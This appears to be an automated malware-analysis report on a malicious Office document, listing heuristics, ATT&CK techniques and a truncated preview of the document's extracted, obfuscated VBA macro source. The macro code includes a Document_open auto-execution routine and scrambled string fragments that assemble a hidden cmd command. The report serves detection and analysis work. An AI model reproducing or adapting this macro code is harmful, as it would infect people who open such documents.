MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. The critical heuristic firing indicates the use of the Shell() function within the VBA code, which is commonly used to execute arbitrary commands or download additional payloads. The Document_Open macro is also present, suggesting automatic execution upon opening the document. The obfuscated nature of the script prevents a more detailed analysis of its specific actions, but the intent is clearly malicious execution.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29875 bytes |
SHA-256: 99ee620906b3e4c2b72526289acefe9aefb744556ccc86c97a39dd26d08e87db |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EjzKQdfowBwasX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jwZwfjA()
tsGwj = (58626 / VkpEh / JlcoVl / jNNEzT / jbOrr * 3830 * UiwRC * VijiU / uzOui - OVdji)
QoXzKD = (11806 / tuhWd / ABiuI / ZiBXE / wirEBG * 89993 * JlTsvT * bUwWj / aYzwo - XPimAs)
FZnRQ = (81310 / akDiBG / WNwjB / MhCHR / jhhdG * 97500 * izlXs * QObFOl / szUTYG - IzXXjA)
bhptb = (53651 / OPiqzp / zNFBYh / FuHNP / UbwSz * 46111 * wtfDu * LLJOG / CpRUhz - qjVnh)
End Function
Function PntWwMffo()
UphYzI = (60369 / NJzzjE / zWYFzp / CzPZc / OMnCZ * 20022 * EXqjYV * rwFBH / JMjjT - DPnhIY)
XSkFCd = (67978 / aYQVhf / djdoEw / llhlN / HtPKLQ * 21634 * iQaCvR * rzSLq / jzBAw - CjwXRQ)
kBVvZ = (42172 / ubfsj / PMDuOR / zBjDi / HdQqiI * 85477 * pqcJbl * OkArm / nCjnu - cXiVS)
zPoJLs = (11430 / AjoJOv / dEYSj / sElBm / NKKCQM * 10478 * ZPubT * MtEPd / AXFHDA - cHLCHY)
hJFJRU = (76018 / PClIiw / mOZWOY / NJNhIL / sImspo * 66472 * IuWikj * OpEEmM / suoDn - vvjMbT)
End Function
Private Sub Document_open()
On Error Resume Next
OqwwH = 94517 / GcLXqi * QANSSm / WnNdD * OIpTf + 65638
jRSfb = 32271 / hIaiq * ziUwGa / vwvvsN * FHtRtX + 93955
cGfdq = 9951 / OJPWut * pYQZr / GUQJo * qNaDOZ + 26957
lrIOB = 5799 / OBaMk * Frfpzo / uRbwZ * MMnzL + 73680
poEuprYaMjD = Application.Run("uCqKMmUvRpQDut", "" + JinwTpS + zWYcRjEiftrDj + CVar("c") + XOznrsI + LqiiUSjDFXj + waafif + crYwDLO + NSjNrTAszOr + UXBvWO + zwtLab + RFDrazhsVOK + wztwhTdzDH + SzWYS + DjCuhaj + rzqaRdIhW + FBPKDnZRR + AdoJbwiJIUS + bLBwq + zwpoXnHsNVX + AMHjRjHLcfQz + hluwPHqVo)
sBKjzb = 32062 / rdTmp * tloiXY / cjYRPz * ItfJn + 35604
cnFAw = 62145 / jDXDSH * aNEhJ / qpLWcf * pWuiY + 16725
End Sub
Function BKzZWTtJsbAcJq()
PRuIma = 45094 / LUvws * tvSEZ / zmHbX * wdSLwL + 73245
uhwYuq = 72698 / nPVZWa * lTTZok / PHviE * ELfXw + 59437
pmjAt = 354 / EnuPjh * phwNK / cKSkwd * DAYkMj + 96921
wCQRmO = 68982 / DKwzKz * GhrmU / wQIqO * nwkzC + 73706
iDfNU = 66402 / hHJOY * dwwbPi / TwDPGZ * PKDzj + 1633
End Function
Attribute VB_Name = "rkoiVPAkzho"
Function waafif()
On Error Resume Next
PMLcF = (USBvKM + rmIqN + TijwKK - INmCc - YlZkJN / jpNzqC + 24557 * cNbVv)
IXLhjd = QLcKil - 45709 / fcMXOl - LGpwUq * 5255 * JfwmNZ * 35528 + zkMJO
qjOBR = (pHfwTb + TRCzcQ + iRlIHz - fAKhjz - utWHw / uhhzX + 52646 * uLKcs)
wWFdPcz = CStr(Chr(LSdvXjfUFGIWI + mcfRHsQJ + 109 + LOicizdFVbBR + jXZnKLAQw)) + "d " + "/" + CStr(Chr(jYwzwuJOMMU + XJfQnoKUHNkjT + 99 + DiuQZwwYhHWjrD + MWhQBjj)) + " f^Or" + " ;" + " /^F " + "; ; " + CStr(Chr(uLcKLNfR + iRDbwYkw + 34 + ISRwIXMlM + wSHikWNVtr)) + " " + "deli" + CStr(Chr(rdoIvlrRiaL + udCoAuFOofz + 109 + LCWdOZslZUUORz + oYGGBqsLhsz)) + "s" + "=T6F"
oHVOvn = (RmbkSS + YQfEz + VXEzj - khKwdj - Xjsuz / ZuJaGA + 62292 * ROOFG)
YuFuUs = (GUQmc + ZXjsjK + wkmkjY - UpipB - QVzQN / NkaMil + 98550 * UnikLU)
dRDukrAhzjO = "H toke" + "ns= " + "+" + "2 " + CStr(Chr(DwpMzapvF + IqUIiZjukjzH + 34 + vVJKvWciUWWfB + ikjMUwKWkd)) + " ," + " %^" + "x ; " + " , In " + ", ( ;" + " " + ";"
BmHwjc = 90019 - tZizFL - 39500 + WjBjq * ubtHv / pwODA - 68400 - JqCTi
RCVhM = 4880 - HnwDz - 90417 + fVfYX * MwwzA / TSvtW - 18992 - zPqZRU
hUMZwZ = " '" + " ; " + "; " + " ^" + "^Ft^^Y" + "PE ;" + " ^| " + " " + "; ^^" + "FinDst"
UnKmo = 90360 - CkTouq - 86380 + DYhnuz * fzWBK / UMSKI - 17769 - ojVGM
TwpanGGOGdw = "r " + ", ; " + " ^" + "^SHC " + " '"
aTEPf = 47205 - TbcLF - 69488 + CmzSfs * IzBcOX / FqYMGj - 5424 - cDMvz
kMpTQK = 98386 - BkoFJI - 20989 + nkZiX * dmhTs / DabrD - 64501 - nhhtBV
fvniEitE = " ; " + "; ) ; " + "D^O " + " " + "," + " , " + "%" + "^x" + ", ,"
rlwaPv = 88513 - tOKsc - 17590 + ukCcF * XInsnM / TCqPbS - 17521 - njiKqU
rcKEi = 89442 - ipZrRW - 4318 + QBXNlE * zBjjJu / kuTIi - 19559 - ESDLup
vuPZnQlUUkw = " k2D" + "/V^4" + "^5"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.